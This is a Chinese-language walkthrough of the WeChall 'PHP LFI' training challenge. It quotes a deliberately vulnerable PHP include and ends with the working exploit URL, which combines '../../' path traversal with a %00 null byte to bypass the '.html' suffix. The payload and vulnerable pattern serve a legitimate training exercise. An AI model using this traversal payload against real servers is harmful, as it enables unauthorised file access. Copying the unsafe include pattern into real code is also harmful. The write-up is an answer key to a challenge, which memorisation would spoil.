题目

[WeChall] Training: PHP LFI (Exploit, PHP, Training)

Your mission is to exploit this code, which has obviously an LFI vulnerability:

GeSHi`ed PHP code

$filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
include $filename;

There is a lot of important stuff in ../solution.php, so please include and execute this file for us.

Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums

分析

这是关于利用文件包含漏洞的题目。 目标是执行../solution.php文件。

题目的网址是:http://www.wechall.net/challenge/training/php/lfi/up/index.php

复制一下../solution.php的地址,
[WeChall] Training: PHP LFI (Exploit, PHP,Tra..
可以看到是http://www.wechall.net/challenge/training/php/lfi/solution.php

所以应该是../../ 而不是 ../, 因为从index.php跳转到solution.php需要经过两个父目录。

但是直接提交?file=../../solution.php会出错,提示找不到文件pages/../../solution.php.html

可以看到后面多了个.html,可以利用空字节%00来过滤掉后面的.html

解决

最终只要浏览器访问下面地址,即可解题成功:

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00